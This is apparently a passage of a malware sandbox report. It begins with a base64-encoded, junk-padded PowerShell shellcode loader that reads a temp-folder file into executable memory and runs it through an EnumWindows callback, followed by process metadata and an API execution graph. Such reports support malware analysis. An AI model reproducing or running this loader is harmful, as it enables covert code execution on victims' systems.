4AbwByAG0AZQByAGkANwAgAEEAYwBjAGUAcwBzAGkAbwBuADUAIABIAEUATgBTAFkAIABhAG4AdABlAGcAbgBkACAAUABoAHIAZQBuADQAIABQAFIASQBNAEEAVABBAEwAIABOAG8AdABpAGMAZQBzAHMAdAA2ACAATQBPAEQARQBSAEwASQAgAGwAbQByAGsAZQByAHMAdQBsACAARgBJAE4ARwBFAFIAIAANAAoAIwBBAG4AdABpAGMAbwAgAFQAUgBPAEwARABFAFMASwBPACAATABPAFYATQBTAFMASQAgAE8AbQBsAGEAcwB0AG4AaQBuAGcANAAgAHYAYQB3AGEAbgB0AGkAZAB5AHMAIABrAG4AZQBiAGwAaQBuAGcAIABmAG8AcgBzAHQAcgBhAG4AZAAgAFQAaQBlAHQAaQBjAGsAbgBhAGEANgAgAGYAbABsAGUAcwBmAGEAZwBzACAAVABhAG4AZwBsAG8AIABTAHYAZQBuADIAIABQAHIAbwBqADQAIABDAE8AQwBLAFQAQQBJAEwAUwAgAFkAZQBsAGwAbwB3AHIAIAANAAoAIwBIAGEAbgBkAHMAIABTAFkARABTACAAUwBpAG4AaQBjAGkAMQAgAGMAZQBuAHQAIABkAG8AbQBuAGUAcwB0AHIAIABEAGUAbQBvACAAUwBDAFIASQAgAEMASABBAFIAQwBVACAAUwBvAG4AZwBmAHUANgAgAA0ACgAjAEIAQQBVAFMAIABTAFQAUgBBAEYARgAgAEQAdQB0AHQAbwBuAGsAcgBhAG4AIABMAEEASwBTACAAUwBjAHIAZQBlAG4AaQAgAFAAUgBPAEQAVQBLAFQASQBWACAAVwBhAGwAawBhAGIAbwB1AHQAbwAyACAAdABvAGcAdgBvAGcAbgB1ACAASQBuAGMAbwAyACAADQAKACMAYQBuAGsAcgAgAEcAcgB1AHAAcABlACAAYgBpAGwAbABlAHQAdAAgAFQAcgBvAGwAaQBnAHMAIABsAGEAbQBwAGUAcwBrAHIAbQAgAFMAQQBMAEcAUwBDAEgAQQBVAEYAIABCAEUAUwBWAEkATQBFAEIAQQAgAFMAcABlAGUAZABvAG0AZQB0ADcAIABBAEYARgBJACAAUwB5AGcAZQBoAGoAbABwADIAIABWAG8AawBzAGUAbgBkACAAQQBmAGgAbwBwAG4AMQAgAGMAbwBsAGUAYQBkAGUAcgBkACAASgBPAFQAVABJAE4AIABSAG8AdQBzAHQAZABvADcAIABmAG8AcgBzAHQAbwBrACAAdAByAGUAZABqAGUAdgBlACAAUwBwAG8AbABlAHIAZQByAGwAIABhAHIAYgBvAHUAcgBpAHMAIAANAAoAIwBLAGgAYQB0AHMAZgAgAEwASQBOAEQAQQBCAFIAIABCAE8AQwBDACAAVABpAG4AawB0AHUAcgBlAHIAMgAgAEIAZQB6AGEAbgB0AHkAdAA2ACAAZgBqAG8AcgAgAHUAZAB0AHIAeQBrAHMAbQBpAGQAIABzAGEAdQBiAGEAYgBsAGUAbgAgAHMAcABlAGUAZAAgAEQAbwBtAG0AZQBuADcAIAANAAoAIwBEAGkAcwBpAG4AOQAgAFAAUgBPAEwATwBOAEcARQBTAEMAIABBAGIAdABlADEAIABTAGEAbABpAGMAeQAzACAARABFAEkASwBTAEkAIABHAFkATgBHAEUAIAB0AGgAbABpAHAAcwBpAHMAcAAgAEMAaQBsAGkAbwBsACAAaQBuAGYAbwAgAFAAYQBsAGEAZQBvAHIAMwAgAEEAZgBmAGkAMwAgAE0ARQBMAE8AIABEAEkAQgBBAFMASQBDAEkAVABZACAASwBvAG4AYwBlAHIAMQAgAFAAbABvAHUAZwBoAHcAcgBpAGcAIABDAE8AUgBPAE4AQQBHACAAQQBmAHQAYQAgAFMAbwBpAGcAbgA1ACAAUwBuAGkAZgBmACAARABpAHMAZABvACAATABPAEMAUgAgAE0ARQBMAEwARQBNAE0AQQBEACAADQAKACMAUwB2AG8AdgBsADcAIAB1AGQAZwBpAGYAdABzACAATABpAG4AZABlAG4AcABhAGwAYQAxACAAdQBuAGQAZQAgAFUAbgBtAGkAcwAyACAAUwB0AGkAYwBrAGYAYQBzAHQAbgAgAGQAZQBzAHQAcgAgAFUAbgBzAGkAbgBlAHcAaQA2ACAAVwBvAG4AbgBpAG4AZwA5ACAATQBlAGwAbABlAG0AdABpAG4AIABzAGsAeQBkAGUAcgBpACAARwBBAEIARgBFAFMAVABTAFYASQAgAFQASQBMAEcAQQBBACAATwBwAGUAcgAgAEIAdQB0AGkAawBzAGcAYQAgAFQAdQBtAGwAaQBuAGcAIABNAG8AcgBhAG4AbgA0ACAAbwBwAHQAYQBsAHQAZQBzACAAaQBjAGsAZQAgAA0ACgAjAFMAdABhAGIAZQBqAHMAZQByACAAUwBQAFIASQBOACAAQQBtAGIAbAB5AGcAbwBuACAAcABvAHIAdAByAGUAcgBzACAATwByAGQAZABhAG4AbgBlACAAZgBvAG4AZABsACAAUwB0AGEAdAB1ACAARAByAGkAdgBoAGoAdQBsAGUAOAAgAGIAYQByAGIAZQB0ACAAVABSAEEAUABOAEUAIABzAHUAYgBjACAAUwB0AHIAZwBnAGEAcgBuACAARgBvAHIAbQAgAEYAUgBBAEcAQQAgAEQAUwBMAEUAUgAgAEUAUgBHAE8AUwBUAEEAIAANAAoAIwBjAG8AbgB2AGUAeQBhACAAcgBlAGMAaQByAGMAbABpAG4AZwAgAGIAYQBnAGYAbABpAGsAbgBpAG4AIABVAG4AcgBvAHUAbgBkAHMAbAAgAG4AYQBiAG8AYgBlAGIAIABCAG8AcgBlAHQAYQBhAHIAbgAgAFAAYQByAGEAbgBvAGkAZAAgAEEAZgBnAHIAZQBsAHMAZQBzAGYAIABOAG8AbgBjAGUAbABsAHUAbAA2ACAASwBvAHIAcgBlAGsAdABpACAAZAB1AG0AbQBlAHMAdABlACAAQQBnAHIAYQAgAEMATABJAE4ASQBDAFMAQQBHACAATQBpAGwAagAgAE0AYQBsAHQAbgBpACAATwBMAEYAQQBDAFQATwAgAEYAYQBnAGsAcgBpAHQAaQBrACAARgBhAHMAYQBuAGgAYQBuADkAIABTAFAASQBEAFMASwBBAEEATAAgAEwAdQByAGUANwAgAEwAYQBkAG4AaQAgAE8AVgBFAFIAUgBLACAATABZAEMAVQBTAFQAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGQAbwB0AHIAaQBhAGMAbwBuADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGcAZABpADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0ARgBvAG4AdABzAEEAKABzAHQAcgBpAG4AZwAgAEEAcgB0AGgAcgBvAGMAbAA5ACwAdQBpAG4AdAAgAGEAcgByAGEAeQAsAGkAbgB0ACAARgBJAEYAVQBMAFIARABFAEkALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADAALABpAG4AdAAgAFMASwBSAE8AVABQAFIALABpAG4AdAAgAEMAYQBzAHMAaQBkAGkAZAAsAGkAbgB0ACAAVQBuAGEAbgBuAGUAYQBsAGUANQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAEsARQBSAE4ARQBMADMAMgAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AIgBDAHIAZQBhAHQAZQBGAGkAbABlAEEAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAYQBjACgAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBMAFAAUwB0AHIAKQBdAHMAdAByAGkAbgBnACAAQQByAHQAaAByAG8AYwBsADkALAB1AGkAbgB0ACAAYQByAHIAYQB5ACwAaQBuAHQAIABGAEkARgBVAEwAUgBEAEUASQAsAGkAbgB0ACAAZABvAHQAcgBpAGEAYwBvAG4AMAAsAGkAbgB0ACAAUwBLAFIATwBUAFAAUgAsAGkAbgB0ACAAQwBhAHMAcwBpAGQAaQBkACwAaQBuAHQAIABVAG4AYQBuAG4AZQBhAGwAZQA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABkAG8AdAByAGkAYQBjAG8AbgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGMAZQBhAG4AbwBsAG8ANgAsAGkAbgB0ACAATQByAGsAbABnACwAcgBlAGYAIABJAG4AdAAzADIAIABkAG8AdAByAGkAYQBjAG8AbgAsAGkAbgB0ACAARABFAEMASQBQAEgALABpAG4AdAAgAGQAbwB0AHIAaQBhAGMAbwBuADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAATQByAGsAbABnADAALAB1AGkAbgB0ACAATQByAGsAbABnADEALABJAG4AdABQAHQAcgAgAE0AcgBrAGwAZwAyACwAcgBlAGYAIABJAG4AdAAzADIAIABNAHIAawBsAGcAMwAsAGkAbgB0ACAATQByAGsAbABnADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAATQByAGsAbABnADUALABpAG4AdAAgAE0AcgBrAGwAZwA2ACkAOwANAAoADQAKAH0ADQAKACIAQAANAAoAIwBNAGkAYQBzAG0AIABQAHMAZQB1AGQAbwBzADkAIABLAG8AbgBkAG8AbABlAG4AYwA4ACAAcgBlAHAAcgBvACAASQBuAHQAZQBnADUAIABTAGsAdQBtAHIAOAAgAEUAUgBHAE8ARABJAEMASQAgAEsAQQBWAEEAIAB5AG4AZABpAGcAZQByACAATABuAHUAZAB2AGkAawBsAGkAOQAgAGcAYQBzAGIAbwByACAAcgB1AG4AZABlAHMAYQAgAFcAZQBhAHAAIABBAEUAUgBPAEQAVQBDAFQAUwBWACAAUwB2AGkAbgBlADMAIABLAHUAbABsAGEAZwByAGUAcwA4ACAARgBvAHIAcwB0AGEAYQBlAGwANwAgAHMAaAByAHUAZwBnAGkAbgAgAEcAUgBVAFMATwBNACAAQgBhAHMAaQBzAHUAZABkAGEAbgAgAFAATgBFAFUATQAgAEQAUgBBAEEAQgBFAEkATgAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAFAAVABFAFIATwBTAFQASQAuAGQAYQB0ACIADQAKACMAUwB0AHIAYQBrACAAUgBlAGcAaQBzAHQAcgBhAG4AdAAgAGoAbwBnAG4AaQBuAGcAcwAgAGMAbwByAG4AdQAgAEYAYQBrAHQAdQByAGEAYgAgAEQAZQBzAGUAcgB0ADgAIABLAEEATgBEAEkAIABTAGkAZQBnAGUAZABnAGkAZgB0ADYAIABQAHIAZQBjAGkAIAB2AGUAcwBpAGMAbwAgAHYAZQBqAHIAZgBvAHIAIAANAAoAJABkAG8AdAByAGkAYQBjAG8AbgAzAD0AMAA7AA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAZABvAHQAcgBpAGEAYwBvAG4AOAA9AFsAZABvAHQAcgBpAGEAYwBvAG4AMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgAzACwAMAAsAFsAcgBlAGYAXQAkAGQAbwB0AHIAaQBhAGMAbwBuADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBQAGwAZQB0ADcAIABFAGsAcwBpAGwAcgBiAG8AcgAyACAARwByAGkAbQBtACAAUAByAG8AcwBlAGMAdABpADMAIABEAEUATgBJAFoARABJAE0AIABCAHIAbQBtAGUAcgAgAEEAZAB2AG8AawBhAHQANgAgAFQAYQByAGUAMQAgAFAAYQBhAHQAYQBnAGUAIABpAG0AcABsAGUAbQAgAFUAbgBhAHMAYwBlAG4AZAA5ACAARgBpAG4AbgA4ACAAQwBPAE0AUABBAFQAIABzAGwAaQBrAG0AdQBuAGQAIABzAGkAcwBoAGEAbQAgAE0ASQBSAEEAQwBMAEUAUwBCACAAQgBlAGwAZABhAG0AcwB0AG8AcgAgAEsAaQBkAG4AYQBwADQAIABTAHUAZABzAGUAcwBwAGEAZwB1ACAAUwBBAEEATABFAEwARABFAFIARQAgAHMAdABhAHQAaQBzAHQAaQAgAEMAZQByAHYAaQBjAGkAcABsACAAUgBpAG0AZQBuAGUAMgAgAEIARQBCAE8ARQBSAEUATAAgAHQAcgBhAG4AcwBzAGsAcgAgAEwAZQB2AG4AZQBkAGUAIABpAHIAcgBlAHAAdAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADQAPQBbAGQAbwB0AHIAaQBhAGMAbwBuADEAXQA6ADoAVgBpAGEAYwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBOAE8ATgBFAEwARQAgAFIAZQBlAG0AcABoAGEAcwA4ACAARgBPAFIAQgBFAEQAIABSAEkAQwBJAE4AVQBTAEUAUwBCACAAVQBuAHMAYwBhAGIAYgBlADgAIABkAGkAYQBtAGUAdAAgAEEAbgB0AGgAcgBvAHAAbwBsAG8AIAB2AHIAdABzAGwAYQBuAGQAIABGAGEAcgB2AGUAYgBsAHkAIABBAFUAWABPAFQATwBYAFMASAAgAE4AUgBHAEEAQQBFAE4ASAAgAEQAdQBkAGUAIABSAEkARgBTAFMAVABSAEEARgBGACAAcQB1AGEAbABtACAAUwBVAEQAQQBOAEUAIABHAGUAbgBmAGQAcwBlACAASABvAHYAZQBkAGsAdQBsACAAUABJAEMAQwAgAFAARQBSAEEAQwBJAEQASQBUACAAbABpAHMAdABlACAAVgBFAFIATgBBAEwAIABPAHUAdABiAGEAbABhACAAUwB0AG8AcgAxACAAVwBlAHQAdABhACAAQwBvAGgAZQBzAGkANQAgAGgAagBlAG0AIAByAGEAZABpAG8AZQByAHMAYwBsACAAZQB4AHQAcgBhAHYAYQBzAGEAdAAgAEMAYQBsAHYAZQAgAGEAbgBoAGUAdQAgAEYATwBSAEgAQQBOAEQATAAgAA0ACgAkAGQAbwB0AHIAaQBhAGMAbwBuADUAPQAwADsADQAKACMAUwBsAHkAbgBnAHIAbwBzAGUANwAgAHYAaQBhAGoAYQBjAGEAaQBtAHAAIABCAGUAbABhAHIAaQAgAFMAcAByAGkAbgBnACAASwBlAHIAdQA5ACAAYwBhAHkAdQBjAG8AZgB5AHIAdAAgAEEARgBNAE4AUwBUAFIARQAgAEsASQBUAEMASAAgAFMAcABvAG4AZwBpAG8AcABsAGEANAAgAE8AdgBlAHIAbAAgAGYAbwB1AGUAdAB0AGUAZQBoAGEAIABYAEkAUABIAE8AIABQAG8AbABsAGIAbwBvAGsAdwA5ACAARgByAG8AcwB0AGsAIABQAEgATwBTAFAASABPAEwASQAgAHMAYQBuAGcAZQBsAG4AYQAgAGsAbwBsAGkAYgByACAARgBsAHkAdgBlAGcAcgAgAGIAdQBsAGIAZQBsAG4AZQBkACAATQBvAGQAdABhADcAIABiAGwAZQBzAGsAdQAgAEIAZQBrAGkAcwBzAGkAOAAgAFUARABUAE8ATgBJAE4ARwBFACAAZwByAGQAaQBhAGIAZQB0AGkAawAgAEEAcgBtAGEAIABQAE8ASQBOAEQAIABSAGUAawBlAHkAZQBkAGgAIABvAGIAcwBjAHUAcgBlAHIAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEMARABBAEMAKAAkAGQAbwB0AHIAaQBhAGMAbwBuADQALAAkAGQAbwB0AHIAaQBhAGMAbwBuADMALAA1ADgAMwA0ADYALABbAHIAZQBmAF0AJABkAG8AdAByAGkAYQBjAG8AbgA1ACwAMAApAA0ACgAjAFUAbgBpAG4AdgBlAG4AdABpACAARABEAEQAUgBVAEsASwBFAE4AIABBAHUAcgBhACAAUwB0AHIAZQBsAHQAegBpAGcAYQAgAFYAYQBsAHUAdABhAGwAYQBhACAASQByAHIAZQAxACAAaABlAHIAbABpAGcAIABCAEUAUwBQAE8AVAAgAE8AUABIAEEAVgBTAFIARQBUACAAQgByAGkAbgAgAGYAbwByAGUAcwBlAHQAdABsACAAaABhAGEAcgBkAGYAcgBvAHMAIAANAAoAWwBkAG8AdAByAGkAYQBjAG8AbgAxAF0AOgA6AEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoACQAZABvAHQAcgBpAGEAYwBvAG4AMwAsACAAMAApAA0ACgANAAoA
                                              Imagebase:0x170000
                                              File size:433152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Target ID:12
                                              Start time:14:02:08
                                              Start date:12/05/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0xe20000
                                              File size:875008 bytes
                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:10.2%
                                                Total number of Nodes:449
                                                Total number of Limit Nodes:37
                                                execution_graph 76597 8745360 76598 8745373 76597->76598 76601 87453c9 76598->76601 76599 87453b7 76602 87453d5 76601->76602 76603 874543b 76602->76603 76606 87455b0 76602->76606 76611 87455c0 76602->76611 76607 87455be 76606->76607 76608 87455fe 76606->76608 76615 8745c35 76607->76615 76608->76603 76609 8745601 76609->76603 76612 87455d4 76611->76612 76614 8745c35 CreateNamedPipeW 76612->76614 76613 8745601 76613->76603 76614->76613 76616 8745c79 76615->76616 76618 8745ce2 76616->76618 76621 8745f87 76616->76621 76625 8745f98 76616->76625 76617 8745cd5 76617->76609 76618->76609 76623 8745fbe 76621->76623 76624 87460c8 76621->76624 76623->76624 76629 8745ae4 76623->76629 76624->76617 76627 8745fbe 76625->76627 76628 87460c8 76625->76628 76626 8745ae4 CreateNamedPipeW 76626->76628 76627->76626 76627->76628 76628->76617 76630 8746278 CreateNamedPipeW 76629->76630 76632 87463aa 76630->76632 77115 5052360 77116 5052372 77115->77116 77118 5054cc8 GetFileAttributesW 77116->77118 77119 5054cd8 GetFileAttributesW 77116->77119 77117 50523a2 77118->77117 77119->77117 76988 85e34e8 76990 85e3511 76988->76990 76989 85e3695 76989->76989 76990->76989 76993 85e3ae0 76990->76993 76998 85e3af0 76990->76998 76994 85e3af0 76993->76994 76995 85e3df3 76994->76995 76996 87f81b8 GetFileAttributesW 76994->76996 76997 87f81a8 GetFileAttributesW 76994->76997 76995->76990 76996->76994 76997->76994 76999 85e3b1b 76998->76999 77000 85e3df3 76999->77000 77001 87f81b8 GetFileAttributesW 76999->77001 77002 87f81a8 GetFileAttributesW 76999->77002 77000->76990 77001->76999 77002->76999 77120 85efa38 77121 85efa80 ReadFile 77120->77121 77122 85efabd 77121->77122 77123 8f61510 77124 8f6179b 77123->77124 77125 8f61539 77123->77125 77126 8f615b6 77125->77126 77127 8f62a90 2 API calls 77125->77127 77127->77126 76633 874a368 76634 874a381 76633->76634 76636 874a500 76634->76636 76641 8633d99 76634->76641 76635 874a534 76645 87f7a5f 76636->76645 76652 87f7998 76636->76652 76662 87f7988 76636->76662 76643 87f7998 GetFileAttributesW 76641->76643 76644 87f7988 GetFileAttributesW 76641->76644 76642 8633da7 76642->76636 76643->76642 76644->76642 76647 87f7a64 76645->76647 76646 87f7b47 76646->76635 76647->76646 76672 87fd4f4 76647->76672 76680 87fd784 76647->76680 76691 87fd3e1 76647->76691 76702 87fd249 76647->76702 76654 87f79c9 76652->76654 76653 87f7b47 76653->76635 76654->76653 76655 87f7a26 76654->76655 76841 87f9f50 76654->76841 76847 87f9f41 76654->76847 76655->76653 76658 87fd249 GetFileAttributesW 76655->76658 76659 87fd4f4 GetFileAttributesW 76655->76659 76660 87fd784 GetFileAttributesW 76655->76660 76661 87fd3e1 GetFileAttributesW 76655->76661 76658->76653 76659->76653 76660->76653 76661->76653 76662->76662 76663 87f7993 76662->76663 76664 87f7b47 76663->76664 76665 87f7a26 76663->76665 76666 87f9f41 GetFileAttributesW 76663->76666 76667 87f9f50 GetFileAttributesW 76663->76667 76664->76635 76665->76664 76668 87fd249 GetFileAttributesW 76665->76668 76669 87fd4f4 GetFileAttributesW 76665->76669 76670 87fd784 GetFileAttributesW 76665->76670 76671 87fd3e1 GetFileAttributesW 76665->76671 76666->76665 76667->76665 76668->76664 76669->76664 76670->76664 76671->76664 76673 87fd4fc 76672->76673 76715 87f96c3 76673->76715 76721 87f9130 76673->76721 76737 87f95b0 76673->76737 76748 87f9840 76673->76748 76754 87f9140 76673->76754 76674 87fd570 76674->76646 76681 87fd447 76680->76681 76682 87fd54a 76681->76682 76683 87fd4a7 76681->76683 76685 87fd4c9 76681->76685 76686 87f96c3 GetFileAttributesW 76682->76686 76687 87f9840 GetFileAttributesW 76682->76687 76688 87f9140 GetFileAttributesW 76682->76688 76689 87f9130 GetFileAttributesW 76682->76689 76690 87f95b0 GetFileAttributesW 76682->76690 76684 87f95b0 GetFileAttributesW 76683->76684 76684->76685 76685->76646 76686->76685 76687->76685 76688->76685 76689->76685 76690->76685 76692 87fd3e6 76691->76692 76693 87fd54a 76692->76693 76694 87fd4a7 76692->76694 76696 87fd4c9 76692->76696 76697 87f96c3 GetFileAttributesW 76693->76697 76698 87f9840 GetFileAttributesW 76693->76698 76699 87f9140 GetFileAttributesW 76693->76699 76700 87f9130 GetFileAttributesW 76693->76700 76701 87f95b0 GetFileAttributesW 76693->76701 76695 87f95b0 GetFileAttributesW 76694->76695 76695->76696 76696->76646 76697->76696 76698->76696 76699->76696 76700->76696 76701->76696 76703 87fd264 76702->76703 76704 87f95b0 GetFileAttributesW 76703->76704 76705 87fd2b7 76703->76705 76704->76705 76706 87fd54a 76705->76706 76707 87fd4a7 76705->76707 76709 87fd4c9 76705->76709 76710 87f96c3 GetFileAttributesW 76706->76710 76711 87f9840 GetFileAttributesW 76706->76711 76712 87f9140 GetFileAttributesW 76706->76712 76713 87f9130 GetFileAttributesW 76706->76713 76714 87f95b0 GetFileAttributesW 76706->76714 76708 87f95b0 GetFileAttributesW 76707->76708 76708->76709 76709->76646 76710->76709 76711->76709 76712->76709 76713->76709 76714->76709 76716 87f96c8 76715->76716 76717 87f972f 76716->76717 76718 87f9140 GetFileAttributesW 76716->76718 76719 87f9130 GetFileAttributesW 76716->76719 76720 87f95b0 GetFileAttributesW 76716->76720 76717->76674 76718->76717 76719->76717 76720->76717 76722 87f9166 76721->76722 76723 87f9197 76722->76723 76725 87f957b 76722->76725 76770 87f8b70 76723->76770 76775 87f8b60 76723->76775 76724 87f95d2 76724->76674 76725->76724 76726 87f96a2 76725->76726 76728 87f971f 76725->76728 76735 87f9140 GetFileAttributesW 76726->76735 76736 87f9130 GetFileAttributesW 76726->76736 76727 87f91f4 76727->76674 76729 87f96be 76728->76729 76730 87f9140 GetFileAttributesW 76728->76730 76731 87f9130 GetFileAttributesW 76728->76731 76732 87f95b0 GetFileAttributesW 76728->76732 76729->76674 76730->76729 76731->76729 76732->76729 76735->76729 76736->76729 76739 87f95c2 76737->76739 76738 87f95d2 76738->76674 76739->76738 76740 87f96a2 76739->76740 76742 87f971f 76739->76742 76746 87f9140 GetFileAttributesW 76740->76746 76747 87f9130 GetFileAttributesW 76740->76747 76741 87f96be 76741->76674 76742->76741 76743 87f9140 GetFileAttributesW 76742->76743 76744 87f9130 GetFileAttributesW 76742->76744 76745 87f95b0 GetFileAttributesW 76742->76745 76743->76741 76744->76741 76745->76741 76746->76741 76747->76741 76749 87f9865 76748->76749 76750 87f98c6 76748->76750 76749->76750 76751 87f9140 GetFileAttributesW 76749->76751 76752 87f9130 GetFileAttributesW 76749->76752 76753 87f95b0 GetFileAttributesW 76749->76753 76750->76674 76751->76750 76752->76750 76753->76750 76755 87f9166 76754->76755 76756 87f9197 76755->76756 76758 87f957b 76755->76758 76763 87f8b70 GetFileAttributesW 76756->76763 76764 87f8b60 GetFileAttributesW 76756->76764 76757 87f95d2 76757->76674 76758->76757 76759 87f96a2 76758->76759 76761 87f971f 76758->76761 76765 87f9140 GetFileAttributesW 76759->76765 76766 87f9130 GetFileAttributesW 76759->76766 76760 87f91f4 76760->76674 76762 87f96be 76761->76762 76767 87f9140 GetFileAttributesW 76761->76767 76768 87f9130 GetFileAttributesW 76761->76768 76769 87f95b0 GetFileAttributesW 76761->76769 76762->76674 76763->76760 76764->76760 76765->76762 76766->76762 76767->76762 76768->76762 76769->76762 76771 87f8b97 76770->76771 76772 87f8b9d 76770->76772 76771->76772 76780 87f8278 76771->76780 76787 87f8288 76771->76787 76772->76727 76776 87f8b97 76775->76776 76777 87f8b9d 76775->76777 76776->76777 76778 87f8278 GetFileAttributesW 76776->76778 76779 87f8288 GetFileAttributesW 76776->76779 76777->76727 76778->76777 76779->76777 76781 87f8286 76780->76781 76782 87f8400 76781->76782 76794 50565c8 76781->76794 76799 87f81b8 76781->76799 76808 87f8200 76781->76808 76812 87f81a8 76781->76812 76782->76772 76788 87f82a5 76787->76788 76789 87f8400 76788->76789 76790 87f81b8 GetFileAttributesW 76788->76790 76791 87f81a8 GetFileAttributesW 76788->76791 76792 50565c8 GetFileAttributesW 76788->76792 76793 87f8200 GetFileAttributesW 76788->76793 76789->76772 76790->76788 76791->76788 76792->76788 76793->76788 76822 5056a30 76794->76822 76827 50569f8 76794->76827 76832 5056a20 76794->76832 76795 50565f2 76795->76781 76805 5056a20 GetFileAttributesW 76799->76805 76806 5056a30 GetFileAttributesW 76799->76806 76807 50569f8 GetFileAttributesW 76799->76807 76800 87f81d2 76801 87f81d8 76800->76801 76803 87f81b8 GetFileAttributesW 76800->76803 76804 87f81a8 GetFileAttributesW 76800->76804 76801->76781 76802 87f8224 76802->76781 76803->76802 76804->76802 76805->76800 76806->76800 76807->76800 76809 87f8224 76808->76809 76810 87f81b8 GetFileAttributesW 76808->76810 76811 87f81a8 GetFileAttributesW 76808->76811 76809->76781 76810->76809 76811->76809 76813 87f81ae 76812->76813 76814 87f81d2 76813->76814 76817 5056a20 GetFileAttributesW 76813->76817 76818 5056a30 GetFileAttributesW 76813->76818 76819 50569f8 GetFileAttributesW 76813->76819 76815 87f81d8 76814->76815 76820 87f81b8 GetFileAttributesW 76814->76820 76821 87f81a8 GetFileAttributesW 76814->76821 76815->76781 76816 87f8224 76816->76781 76817->76814 76818->76814 76819->76814 76820->76816 76821->76816 76823 5056a48 76822->76823 76824 5056a5d 76823->76824 76837 5056650 76823->76837 76824->76795 76828 50569fd 76827->76828 76829 5056a5d 76828->76829 76830 5056650 GetFileAttributesW 76828->76830 76829->76795 76831 5056a8e 76830->76831 76831->76795 76833 5056a48 76832->76833 76834 5056a5d 76833->76834 76835 5056650 GetFileAttributesW 76833->76835 76834->76795 76836 5056a8e 76835->76836 76836->76795 76838 505a5e0 GetFileAttributesW 76837->76838 76840 5056a8e 76838->76840 76840->76795 76843 87f9f6c 76841->76843 76842 87fa05b 76842->76655 76843->76842 76853 87fa23d 76843->76853 76859 87fa240 76843->76859 76844 87fa22b 76844->76655 76848 87f9f50 76847->76848 76849 87fa05b 76848->76849 76851 87fa23d GetFileAttributesW 76848->76851 76852 87fa240 GetFileAttributesW 76848->76852 76849->76655 76850 87fa22b 76850->76655 76851->76850 76852->76850 76854 87fa246 76853->76854 76855 87fa24f 76853->76855 76854->76844 76856 87fa2b7 76855->76856 76857 87f95b0 GetFileAttributesW 76855->76857 76856->76844 76858 87fa2d4 76857->76858 76860 87fa246 76859->76860 76861 87fa24f 76859->76861 76860->76844 76862 87fa2b7 76861->76862 76863 87f95b0 GetFileAttributesW 76861->76863 76862->76844 76864 87fa2d4 76863->76864 76865 85ed8c0 76866 85ed8e5 76865->76866 76867 85ed91f 76866->76867 76870 8f64858 76866->76870 76873 8f64868 76866->76873 76871 8f64897 76870->76871 76876 8f64620 76870->76876 76875 8f64620 2 API calls 76873->76875 76874 8f64897 76875->76874 76877 8f64649 76876->76877 76880 8f64518 